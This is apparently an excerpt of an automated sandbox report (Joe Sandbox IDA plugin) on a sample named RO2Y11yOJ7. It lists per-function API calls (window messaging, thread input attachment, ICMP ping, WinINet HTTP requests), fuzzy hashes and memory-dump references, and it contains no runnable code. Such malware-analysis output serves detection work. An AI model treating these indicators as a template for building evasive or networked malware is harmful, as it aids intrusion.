                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                          • String ID:
                                                          • API String ID: 4176008265-0
                                                          • Opcode ID: 049b870fa03a3d0375aaec172e675da0a3dfdc6f4a5b9f7ddc0c3078c8cfbb52
                                                          • Instruction ID: d1c4c3ada7788e5bd2ee6ed7de780cd415cb29e92c287fa47dbab77b0e0086ef
                                                          • Opcode Fuzzy Hash: 049b870fa03a3d0375aaec172e675da0a3dfdc6f4a5b9f7ddc0c3078c8cfbb52
                                                          • Instruction Fuzzy Hash: E5617C70900249AFDB22CF68CD88EAF7BB9EF46704F150069F842A7251DB31AD15DB61
                                                          APIs
                                                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 003C6FD7
                                                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 003C6FDA
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 003C6FFE
                                                          • _memset.LIBCMT ref: 003C700F
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 003C7021
                                                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 003C7099
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$LongWindow_memset
                                                          • String ID:
                                                          • API String ID: 830647256-0
                                                          • Opcode ID: 3f9c8998ef1eedfd9a5f37cc5b06e2b8b413899b0c9b71688d326e6627d0c236
                                                          • Instruction ID: de0be98dbbf591e50169bb4b1470949af0db867c4196378d173fbd4bad9db61a
                                                          • Opcode Fuzzy Hash: 3f9c8998ef1eedfd9a5f37cc5b06e2b8b413899b0c9b71688d326e6627d0c236
                                                          • Instruction Fuzzy Hash: F7614775A00208AFDB12DFA4CD81EEE77B8EB09710F14416AFA15EB2A1C770AD51DF64
                                                          APIs
                                                          • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00396F15
                                                          • SafeArrayAllocData.OLEAUT32(?), ref: 00396F6E
                                                          • VariantInit.OLEAUT32(?), ref: 00396F80
                                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 00396FA0
                                                          • VariantCopy.OLEAUT32(?,?), ref: 00396FF3
                                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 00397007
                                                          • VariantClear.OLEAUT32(?), ref: 0039701C
                                                          • SafeArrayDestroyData.OLEAUT32(?), ref: 00397029
                                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00397032
                                                          • VariantClear.OLEAUT32(?), ref: 00397044
                                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0039704F
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                          • String ID:
                                                          • API String ID: 2706829360-0
                                                          • Opcode ID: cbd5f726719dc6c75de8aa1f672a3b1ba22f1377831a00527b19434aa98515da
                                                          • Instruction ID: 4b07c52cc14a5d6c39b8084520ce5fb0fc393e50feb71ac6e65fc8f39fa1e6b1
                                                          • Opcode Fuzzy Hash: cbd5f726719dc6c75de8aa1f672a3b1ba22f1377831a00527b19434aa98515da
                                                          • Instruction Fuzzy Hash: 8F416E75A002199FCF06DFA5D848DAEBBB9EF48350F008069E956EB261CB30B945CB90
                                                          APIs
                                                            • Part of subcall function 00349997: __itow.LIBCMT ref: 003499C2
                                                            • Part of subcall function 00349997: __swprintf.LIBCMT ref: 00349A0C
                                                          • CoInitialize.OLE32 ref: 003B8518
                                                          • CoUninitialize.OLE32 ref: 003B8523
                                                          • CoCreateInstance.OLE32(?,00000000,00000017,003D2BEC,?), ref: 003B8583
                                                          • IIDFromString.OLE32(?,?), ref: 003B85F6
                                                          • VariantInit.OLEAUT32(?), ref: 003B8690
                                                          • VariantClear.OLEAUT32(?), ref: 003B86F1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                          • API String ID: 834269672-1287834457
                                                          • Opcode ID: 32e4645de2492b22ddcc43defad91feb82e5a7ca98ee2872138e36e949ef91bb
                                                          • Instruction ID: dafdeaf6199de4b0755100656bca316d1b3a1e3b17663232f2bd6f5546731577
                                                          • Opcode Fuzzy Hash: 32e4645de2492b22ddcc43defad91feb82e5a7ca98ee2872138e36e949ef91bb
                                                          • Instruction Fuzzy Hash: F06182706083119FD712DF24C845FABB7ECAF45718F04481AFA859BA91DB70ED44CB92
                                                          APIs
                                                          • WSAStartup.WSOCK32(00000101,?), ref: 003B58A9
                                                          • inet_addr.WSOCK32(?,?,?), ref: 003B58EE
                                                          • gethostbyname.WSOCK32(?), ref: 003B58FA
                                                          • IcmpCreateFile.IPHLPAPI ref: 003B5908
                                                          • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 003B5978
                                                          • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 003B598E
                                                          • IcmpCloseHandle.IPHLPAPI(00000000), ref: 003B5A03
                                                          • WSACleanup.WSOCK32 ref: 003B5A09
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                          • String ID: Ping
                                                          • API String ID: 1028309954-2246546115
                                                          • Opcode ID: 1d2cd02923ce18f4023cf9983763eee8a645283bb87198f9e69df235a818d7cb
                                                          • Instruction ID: efb7c1af3dc9ff6228c743846df9e96e1a34ed6c39519fe8e010be21fe5b9420
                                                          • Opcode Fuzzy Hash: 1d2cd02923ce18f4023cf9983763eee8a645283bb87198f9e69df235a818d7cb
                                                          • Instruction Fuzzy Hash: BF516E31604700DFDB12AF24CC86B6AB7E8EF48724F15452AFA96DB6A1DB70ED00DB51
                                                          APIs
                                                          • SetErrorMode.KERNEL32(00000001), ref: 003AB55C
                                                          • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 003AB5D2
                                                          • GetLastError.KERNEL32 ref: 003AB5DC
                                                          • SetErrorMode.KERNEL32(00000000,READY), ref: 003AB649
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Error$Mode$DiskFreeLastSpace
                                                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                          • API String ID: 4194297153-14809454
                                                          • Opcode ID: 504bcb07564cc003fe1dc4ec34178577acf36f8154331991c50d4c887018b56d
                                                          • Instruction ID: d6d1e55ab04d2bddf50a69222d3d75c083bcc4f1fb768c0c85c6afe8625f8477
                                                          • Opcode Fuzzy Hash: 504bcb07564cc003fe1dc4ec34178577acf36f8154331991c50d4c887018b56d
                                                          • Instruction Fuzzy Hash: EF318175A002099FDB16DFA4C885EFEB7B8EF06300F154125F501DB2A2DB71AD01CB90
                                                          APIs
                                                            • Part of subcall function 00347F41: _memmove.LIBCMT ref: 00347F82
                                                            • Part of subcall function 0039AEA4: GetClassNameW.USER32(?,?,000000FF), ref: 0039AEC7
                                                          • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 003992D6
                                                          • GetDlgCtrlID.USER32 ref: 003992E1
                                                          • GetParent.USER32 ref: 003992FD
                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00399300
                                                          • GetDlgCtrlID.USER32(?), ref: 00399309
                                                          • GetParent.USER32(?), ref: 00399325
                                                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 00399328
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 1536045017-1403004172
                                                          • Opcode ID: 00f400c9db1c5d0a1e65667b6ce54dca683b6e61da9e933da8e07c28c6d1e57a
                                                          • Instruction ID: d4978a39d4bf7b428c532e41ae34ad99793893e5bd5fd2a6d16e03e9c72b1a1c
                                                          • Opcode Fuzzy Hash: 00f400c9db1c5d0a1e65667b6ce54dca683b6e61da9e933da8e07c28c6d1e57a
                                                          • Instruction Fuzzy Hash: F721C475D00108BFDF06AB64CC85EFDBBA9EF59310F10015AF5619B2E1DB756819DB20
                                                          APIs
                                                            • Part of subcall function 00347F41: _memmove.LIBCMT ref: 00347F82
                                                            • Part of subcall function 0039AEA4: GetClassNameW.USER32(?,?,000000FF), ref: 0039AEC7
                                                          • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 003993BF
                                                          • GetDlgCtrlID.USER32 ref: 003993CA
                                                          • GetParent.USER32 ref: 003993E6
                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 003993E9
                                                          • GetDlgCtrlID.USER32(?), ref: 003993F2
                                                          • GetParent.USER32(?), ref: 0039940E
                                                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 00399411
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 1536045017-1403004172
                                                          • Opcode ID: 1512d0340ba542e7f95da64050155482c252a2ef08cad87ea4c654e776185b47
                                                          • Instruction ID: 7494c93d67146129e455b07e69315d541ca170d94f2fe05ccf00c7486336957c
                                                          • Opcode Fuzzy Hash: 1512d0340ba542e7f95da64050155482c252a2ef08cad87ea4c654e776185b47
                                                          • Instruction Fuzzy Hash: 3321B6759001047FDF02ABA5CC85EFEBBB9EF54300F10015AF9519B2A1DB756929DB20
                                                          APIs
                                                          • GetParent.USER32 ref: 00399431
                                                          • GetClassNameW.USER32(00000000,?,00000100), ref: 00399446
                                                          • _wcscmp.LIBCMT ref: 00399458
                                                          • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 003994D3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: ClassMessageNameParentSend_wcscmp
                                                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                          • API String ID: 1704125052-3381328864
                                                          • Opcode ID: d3000b91585d63c5668184f984be2e894b8a4b0356d0d16b00ed2bccc866c40b
                                                          • Instruction ID: e642a12ceecfb4870927b4ad47071e6f69b9114999f320c31c13e4723603e9f7
                                                          • Opcode Fuzzy Hash: d3000b91585d63c5668184f984be2e894b8a4b0356d0d16b00ed2bccc866c40b
                                                          • Instruction Fuzzy Hash: 5811CA7724C307BEFE136629AC0AEE7779C9F15720F20802BFA05E54E1FB9168524654
                                                          APIs
                                                          • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 003A7B15
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: ArraySafeVartype
                                                          • String ID:
                                                          • API String ID: 1725837607-0
                                                          • Opcode ID: 3680d9d8a9934cda39cba6ff982ab085eb1d160f65e31ad5e72e83356631a0c5
                                                          • Instruction ID: 18b95e75450c319f8e7a704417ca801b4bccd370ecf30ff529f2533c8939c7cd
                                                          • Opcode Fuzzy Hash: 3680d9d8a9934cda39cba6ff982ab085eb1d160f65e31ad5e72e83356631a0c5
                                                          • Instruction Fuzzy Hash: ACB18E7190421A9FDB12DFA4CCC5BBEB7B9EF0A321F254469E500EB291D734E941CBA0
                                                          APIs
                                                          • GetCurrentThreadId.KERNEL32 ref: 003A1521
                                                          • GetForegroundWindow.USER32(00000000,?,?,?,?,?,003A0599,?,00000001), ref: 003A1535
                                                          • GetWindowThreadProcessId.USER32(00000000), ref: 003A153C
                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003A0599,?,00000001), ref: 003A154B
                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 003A155D
                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003A0599,?,00000001), ref: 003A1576
                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003A0599,?,00000001), ref: 003A1588
                                                          • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,003A0599,?,00000001), ref: 003A15CD
                                                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,003A0599,?,00000001), ref: 003A15E2
                                                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,003A0599,?,00000001), ref: 003A15ED
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                          • String ID:
                                                          • API String ID: 2156557900-0
                                                          • Opcode ID: 2d9c64ab200b4c0040f7c00c7f2642a0b09440c2e626c767293be912c76fde93
                                                          • Instruction ID: b4928d0fc5df5216a4da634c025a1c9dd7c3a2b4acd73c2422aa777ba0c98f46
                                                          • Opcode Fuzzy Hash: 2d9c64ab200b4c0040f7c00c7f2642a0b09440c2e626c767293be912c76fde93
                                                          • Instruction Fuzzy Hash: FC310471D00205FFEB229F90ED44F6937AEEB87351F124026FA02D61A0D7B0AD508B68
                                                          APIs
                                                          • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0034FC06
                                                          • OleUninitialize.OLE32(?,00000000), ref: 0034FCA5
                                                          • UnregisterHotKey.USER32(?), ref: 0034FDFC
                                                          • DestroyWindow.USER32(?), ref: 0038492F
                                                          • FreeLibrary.KERNEL32(?), ref: 00384994
                                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 003849C1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                          • String ID: close all
                                                          • API String ID: 469580280-3243417748
                                                          • Opcode ID: a564c8b44e3de4dedad310384ca580ddb01d668280a55dc34f8492687491f69a
                                                          • Instruction ID: 8b79512780fcc5bab7801b0c61aeb4b872fe30a0f5321760e115792f9731bfbc
                                                          • Opcode Fuzzy Hash: a564c8b44e3de4dedad310384ca580ddb01d668280a55dc34f8492687491f69a
                                                          • Instruction Fuzzy Hash: 15A15C31701612CFCB2BEF14C995A2AF7A4AF05750F5542ADE80AAF662DB30ED16CF50
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Variant$ClearInit$_memset
                                                          • String ID: ,,=$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                          • API String ID: 2862541840-1434771687
                                                          • Opcode ID: c7cc6e889c062e01264c401a06cc99289cb7659d34bdef40d69fab0941dcc1cf
                                                          • Instruction ID: ca19242d1123cb7e883f505ef3bf76c202b381c9a96daf80c33c1928680eb8dc
                                                          • Opcode Fuzzy Hash: c7cc6e889c062e01264c401a06cc99289cb7659d34bdef40d69fab0941dcc1cf
                                                          • Instruction Fuzzy Hash: D491AE71A00219AFDF26CFA5C844FEEBBB8EF45714F11855AF709AB680D7709901CBA0
                                                          APIs
                                                          • EnumChildWindows.USER32(?,0039A844), ref: 0039A782
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: ChildEnumWindows
                                                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                          • API String ID: 3555792229-1603158881
                                                          • Opcode ID: 2102fc0d233995dd2b5d94c178e74f3e762d80ecfb16709e438c118cfadb70b6
                                                          • Instruction ID: 7a370e2535ccaa47188ed5c17d47b6631597e29c8a203ad0803b31faf00096a7
                                                          • Opcode Fuzzy Hash: 2102fc0d233995dd2b5d94c178e74f3e762d80ecfb16709e438c118cfadb70b6
                                                          • Instruction Fuzzy Hash: 7791C670A04906ABCF0AEFA0C492BEEFBB5FF04304F548219D959AB151DF306959CBD1
                                                          APIs
                                                          • SetWindowLongW.USER32(?,000000EB), ref: 00342EAE
                                                            • Part of subcall function 00341DB3: GetClientRect.USER32(?,?), ref: 00341DDC
                                                            • Part of subcall function 00341DB3: GetWindowRect.USER32(?,?), ref: 00341E1D
                                                            • Part of subcall function 00341DB3: ScreenToClient.USER32(?,?), ref: 00341E45
                                                          • GetDC.USER32 ref: 0037CEB2
                                                          • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0037CEC5
                                                          • SelectObject.GDI32(00000000,00000000), ref: 0037CED3
                                                          • SelectObject.GDI32(00000000,00000000), ref: 0037CEE8
                                                          • ReleaseDC.USER32(?,00000000), ref: 0037CEF0
                                                          • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0037CF7B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                          • String ID: U
                                                          • API String ID: 4009187628-3372436214
                                                          • Opcode ID: 65ffa7c72b79785cd4161b96a6fd22eae357a4b76c7a4261caa731bfe6e5f216
                                                          • Instruction ID: 604ee2734c053bdf56eae308cc124457d8f683e85eccf459b4f2865f617ca1b1
                                                          • Opcode Fuzzy Hash: 65ffa7c72b79785cd4161b96a6fd22eae357a4b76c7a4261caa731bfe6e5f216
                                                          • Instruction Fuzzy Hash: E471AF31400205DFCF339F64C880AAA7BBAFF49311F15926EFD59AA266C7359891DF60
                                                          APIs
                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 003B1B66
                                                          • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 003B1B92
                                                          • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 003B1BD4
                                                          • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 003B1BE9
                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003B1BF6
                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 003B1C26
                                                          • InternetCloseHandle.WININET(00000000), ref: 003B1C6D
                                                            • Part of subcall function 003B2599: GetLastError.KERNEL32(?,?,003B192D,00000000,00000000,00000001), ref: 003B25AE
                                                            • Part of subcall function 003B2599: SetEvent.KERNEL32(?,?,003B192D,00000000,00000000,00000001), ref: 003B25C3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                          • String ID:
                                                          • API String ID: 2603140658-3916222277
